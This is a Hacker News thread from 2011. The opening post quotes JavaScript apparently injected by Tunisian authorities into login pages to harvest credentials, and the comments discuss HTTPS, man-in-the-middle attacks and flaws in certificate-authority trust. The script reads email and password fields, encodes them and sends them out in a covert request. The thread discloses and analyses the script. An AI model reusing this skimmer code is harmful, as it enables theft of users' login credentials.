Hacker News new | past | comments | ask | show | jobs | submit login
79 points by SimplePast on Jan 7, 2011 | hide | past | web | favorite | 36 comments
This is the function used by Tunisia Gov agencies to harvest login/passwords : see also http://www.thetechherald.com/article.php/201101/6651

<script language="javascript"> <!-- function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F; st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;} function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;} function hAAAQ3d() {var frm = document.getElementById("gaia_loginform"); var us3r = frm.Email.value; var pa55 = frm.Passwd.value; var url = "http://www.google.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);} function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;} function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");} function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");} //-->


This is why login forms themselves must be opened over an HTTPS connection. Displaying a login form over HTTP which POSTs to HTTPS is easily MITMd.

Think of your users. Some of them will be accessing your sites from oppressive regimes. Let them do so safely.

Taking Facebook as an example, considering how global their usage is, and the amount of sensitive data peoples accounts contain, it's unforgivable that they don't force HTTPS traffic for everything.

Unfortunately, that is easily defeated by modifying all non-SSL pages on the site to link to a non-SSL login page look-alike (which is easily generated by downloading the real one over SSL and forwarding it decrypted). I don't see any reasonable way to solve this other than /always/ using SSL for your site.

Slim Amamou, who is named in the article as the on who discovered this code, has been arrested. His phone is still updating his Google Latitude position, moving between several government buildings.


Fortunately, because the fake "wo0dh3ad" page accessed was on their site, Facebook may well have a log of everyone whose account was compromised and can take steps to warn and protect their Tunisian users.

Why would the Tunisian government have allowed ISPs to forward these requests? Facebook probably knows nothing about this.

Proves again, there is really no excuse not to use HTTPS for everything.

Encryption/certificate validation make it much harder to pull of a MITM attack like this, especially by companies and small repressive governments.

The simple answer for small repressive governments is to block the HTTPS login form so you have to fall back to HTTP. ATI has complete control of all Internet access in Tunisia. You're just not going to get through them unless you can find a way through.

In some countries I work in we routinely come across censorship and all kinds of dodgy goings on, so we have a variety of tunnelling methods (VPN, SSH, ICMPTX, DNSTX, Tor and a few non-public tunnelling options). For the most part as long as you can terminate a connection in somewhere you're fairly comfortable with you're better off.

Also don't make the mistake of feeling that the US, UK or EU are automatically comfortable options. It all depends what you're doing with the data. A little common sense goes a long way.

Of course, governments can completely block port 443, but that will make so many internet sites unusable they could just as well completely pull the plug.

And with 'HTTPS everywhere', I also mean removing the HTTP fallback. Fallbacks to plaintext (that can be triggered by a MITM) are indeed obvious backdoors that should be avoided in any protocol.

Correct ! Facebook https is already blocked !

I agree TLS should be more widely used. But...

When the government or ISP in question controls its own certificate authority (and many do), they can MITM you even over HTTPS. Yes, it's another speedbump for them to get over. No, it's not going to stop them.

The X.509 security model is broken and needs fixing or replacing.

Are there any certifying authorities which can be considered relatively free of government/corporate control?

That doesn't matter until browsers start paying attention to which authority signed the certificate.

I guess SSL is an improvement. Now you just have to trust 2000 companies and anyone controlling their purse strings, instead of having to trust everyone. You feel safe, which is much better than being safe...

Yes, it's not perfect either. It won't stop the NSA or even China's government. But it would stop me, and probably you, from pulling this trick :)

Using SSL(TLS) everywhere would go a long way toward security. It's much preferable over plaintext.

I really loathe arguments like "it's not perfectly secure, so let's use something even less secure". Making it harder means a larger investment for the attacker, especially as they have to do the certificate trick for each individual site instead of some simple interception blanket.

So what you are trying to convey, there is no advantage to using SSL vs. plain connection? I wonder why then they shut down SSL in my home country during elections..

There's no advantage against a motivated, state-sized actor. Against other attackers there is still substantial advantage.

Let's say there is no advantage against (maybe) the U.S. government. I fail to see how any other state or entity would be able to manipulate certificate authority chain in general.

If you are a certificate authority, you can issue certificates for any domain. There is nothing in the technology preventing you from issuing a whitehouse.gov certificate merely because you are based in Iran, for example.

Who is going to sign it?

Who is going to sign what?

If you mean the certificates that the certificate authority issues, then the certificate authority signs them itself.

If you mean who signs the certificate authority's authority certificate, then either another certificate authority signs it, or the certificate authority signs it itself and pays the browser makers to include it as a root certificate in their browsers.

I'm not sure what you're trying to get at?

What is the chance of Iran becoming a root CA? Passing a WebTrust audit? It's not like you can become one just by showing up.

Etisalat (state-controlled telecoms company in UAE) is a certificate authority. They are not a root CA --- Verizon signed their CA certificate. They have used this capability to intercept SSL communications.

If a UAE state-controlled telecoms company can become a CA, why not an Iranian state-controlled telecoms company? Or Chinese?

You are. You are the certificate authority, and you're trusted. Anything you sign is, by definition, valid.

Except every browser I know will barf at self-signed cert.

Not when you are a certificate authority that is already trusted by the browsers.

Modern browsers today accept a large number of "self-signed" certificates. The key is that the signer paid the browser makers money for that privilege. SSL assumes that those companies are all trustworthy, but is any company trustworthy when the government shows up with guns and asks for the master password to your key signer?

If no, then SSL fails.

Let me summarize because you seem to be misunderstanding: a lot of untrustworthy parties are trusted by browsers. This makes SSL somewhat useful against having a coffee shop steal your Facebook password, but almost certainly useless against having a government steal your password.

With this scale of access to the network infrastructure[1], I'd be worried about them injecting drive-by downloads of browser exploits which install trust for a root certificate controlled by the government. Once in place, MITM attacks on https are possible. The tricky bit would be telling apart requests from compromised machines and uncompromised ones. (attempting to MITM the latter will cause the browser to start jumping up and down, potentially raising suspicion)

Even more scary is the thought experiment that Microsoft might cooperate with the Tunisian government and allow installing trust for such a root certificate via the windows update mechanism. (I have no evidence that this actually happens, it just seems a convenient vector)

[1] They're under no time pressure and can transparently proxy every single TCP connection and IP packet if they so desire. They control DNS.

If you want scary, what about bribing Intel and AMD to include 'propietrary instructions' for your government?

Seems a little far-fetched and overly complicated for carrying out a practical attack.

Yes, but at least it would work for practically everything, and it seems most effective to start at the source if you're bribing big companies anyway. If you bribe Microsoft you'll only get the IE (and possibly Windows) users, and privacy-minded individuals will likely be avoiding those already.

Also it's pretty much impossible to patch and protect against, even if you know the exploit exists.

You'd still need some kind of software support to trigger the exploit. At which point you may as well go with a software-only attack.

Naah, if it's simply a few added instructions I agree with you.

But let's think in a wider scope (disclaimer: this is not my idea, I remember reading about it a long time ago): what if a certain cryptographic "magic code" at the beginning of a memory page would trigger the execution of arbitrary code embedded in that page?

Such a thing could be triggered over the network, wireless through bluetooth/wifi, or by specially crafted images on a webpage, or whatever creative technique you can think of. It'd effectively give the govt instant root access to any device with the affected CPUs.

Stuff like this would be easy to hide in the guise of "Hardware DRM."

Yes, I guess on-processor DRM and any kind of virtualisation (will the real hypervisor please stand up?) are prime suspects for this kind of thing. But they are also the most obvious, it could be cramped into everything.

It'd be mighty interesting to tear apart / scan / reverse engineer some modern CPUs like they did with the 6502. Then again, these beasts are so complex that's similar to looking for a needle in a galaxy-sized haystack.


Quite a few of Tunisian websites are signed by "Agence Nationale de Certification Electronique".

Also, there so many intermediate CA's that I find it hard to believe that the system isn't broken:

https://www.eff.org/files/colour_map_of_CAs.pdf (via https://www.eff.org/observatory)

We already had UAE government successfully MITM-ing SSL by forcing CyberTrust-delegated CA to forge a certificate:


So, is pornography actually illegal in Tunisia, or is this a case of "Well, we just don't like it when you do it."?

I'm not sure there's a big distinction under an authoritarian regime

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact